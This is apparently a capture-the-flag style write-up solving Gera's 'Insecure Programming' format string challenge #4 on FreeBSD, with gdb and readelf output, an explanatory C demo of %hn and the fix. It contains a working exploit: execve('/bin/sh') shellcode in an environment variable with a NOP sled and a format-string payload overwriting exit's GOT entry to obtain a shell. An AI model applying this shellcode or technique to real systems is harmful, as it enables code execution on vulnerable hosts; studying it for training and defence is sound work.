Gera's Insecure Programming Format String #4

One more completed challenge is needed before we can declare format strings dead. This challenge from the format string section of Gera's Insecure Programming is solvable with essentially the same approach as challenge #3.

I am going to keep this post brief. If you want a more detailed description of the method, see the challenge #3 write-up.

Gera's challenge is posted below and can be found here.

{% highlight c %}
/* fs4.c                                                 *
 * specially crafted to feed your brain by gera          */

/* Have you ever heard about code reusability? */

#include <stdio.h>

int main(int argv,char **argc) {
    char buf[256];

    snprintf(buf,sizeof buf,"%s%6$hn",argc[1]);
    printf(buf);

}
{% endhighlight %}

As you may notice, the only difference is that direct parameter access ("%6$hn") is used in the format string. As usual, the targeted platform is FreeBSD 8.2-RELEASE.

{% highlight c %}
./fs4 AAAABBBBCCCCDDDD
Segmentation fault (core dumped)
gdb -q fs4 fs4.core
..snip..

#0 0x2816f329 in open () from /lib/libc.so.7

(gdb) x/i $eip
0x2816f329 <open+11965>: mov %dx,(%eax)
(gdb) printf "%p %p\n", $eax, $edx
0x44444444 0x10
(gdb) q
{% endhighlight %}

From here, the steps are the same as in #3. The only difference is that 16 bytes of input are needed to trigger the vulnerability.
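To make concrete why the crash shows a two-byte store (`mov %dx,(%eax)`) with `edx = 0x10` after exactly 16 bytes of input, here is an added example that is not part of Gera's challenge or this write-up: it uses the same `%s` followed by `%hn` pattern, but with the `%hn` target given explicitly as a controlled argument, and puts the corrected `printf` call beside it. The input string and seed value 0xAAAAAAAA are constructed for the demonstration.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Constructed variant of fs4.c: same "%s then %hn" pattern, but the %hn
 * target is an explicit argument rather than the 6th word on the stack.
 * Returns what %hn stored: the number of bytes converted so far. */
unsigned short hn_stores_byte_count(const char *input) {
    char buf[256];
    short count = -1;
    snprintf(buf, sizeof buf, "%1$s%2$hn", input, &count);
    return (unsigned short)count;
}

/* %hn is a 2-byte store, so only half of a 32-bit word changes.
 * Seeds a word with 0xAAAAAAAA (constructed), lets %hn write into it
 * and returns the result. */
uint32_t hn_overwrites_half_word(const char *input) {
    char buf[256];
    union { uint32_t word; short half; } u = { .word = 0xAAAAAAAAu };
    snprintf(buf, sizeof buf, "%1$s%2$hn", input, &u.half);
    return u.word;
}

/* Expected result of the half-word write, computed without assuming
 * endianness: the 16-bit count lands on the first two bytes of the word. */
uint32_t expected_half_word(unsigned short count) {
    uint32_t word = 0xAAAAAAAAu;
    memcpy(&word, &count, sizeof count);
    return word;
}

/* The fix for fs4.c: untrusted text is an argument, never the format.
 * Returns printf's byte count, so directives in s are visibly printed
 * literally instead of being interpreted. */
int print_untrusted(const char *s) {
    return printf("%s\n", s);   /* literal format: -Wformat-security stays quiet */
}

int main(void) {
    const char *input = "AAAABBBBCCCCDDDD";  /* constructed, same as the crash input */
    printf("%%hn stored 0x%04x (%u bytes written so far)\n",
           hn_stores_byte_count(input), hn_stores_byte_count(input));
    printf("0xAAAAAAAA after %%hn: 0x%08x\n", hn_overwrites_half_word(input));
    print_untrusted("%s%6$hn");
    return 0;
}
```

With the 16-byte input the stored value is 0x0010, which is the `edx` seen in the crash; the only thing the attacker-controlled format adds in fs4.c is where that half-word lands.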

{% highlight c %}
readelf -r fs4

Relocation section '.rel.plt' at offset 0x2b0 contains 5 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
080496ec  00000107 R_386_JUMP_SLOT   00000000   _init_tls
080496f0  00000407 R_386_JUMP_SLOT   00000000   printf
080496f4  00000507 R_386_JUMP_SLOT   00000000   snprintf
080496f8  00000607 R_386_JUMP_SLOT   00000000   exit
080496fc  00000807 R_386_JUMP_SLOT   00000000   atexit
{% endhighlight %}

Once again, we look for an address in the PLT and use exit's entry. The payload is set up the same way as in all previous write-ups: in an environment variable. The environment variable was found at 0xbfbd6905. In the payload, we use the trap instruction ("\xcc") to see if execution lands in the NOP sled.

{% highlight c %}
setenv SHELLCODE `perl -e 'print "\x90"x65536 ."\xcc"x100000 ."\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"'`
./fs4 AAAABBBBCCCC`perl -e 'print "\xfa\x96\x04\x08"."A"x49069'`
Trace/BPT trap (core dumped)
{% endhighlight %}

We hit our trap instruction; therefore, we simply exchange the "\xcc" bytes for "\x90" and should get a shell.

{% highlight c %}
setenv SHELLCODE `perl -e 'print "\x90"x65536 ."\x90"x100000 ."\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"'`
./fs4 AAAABBBBCCCC`perl -e 'print "\xfa\x96\x04\x08"."A"x49069'`
$
{% endhighlight %}

lixor_: 4 and format string (FS): 0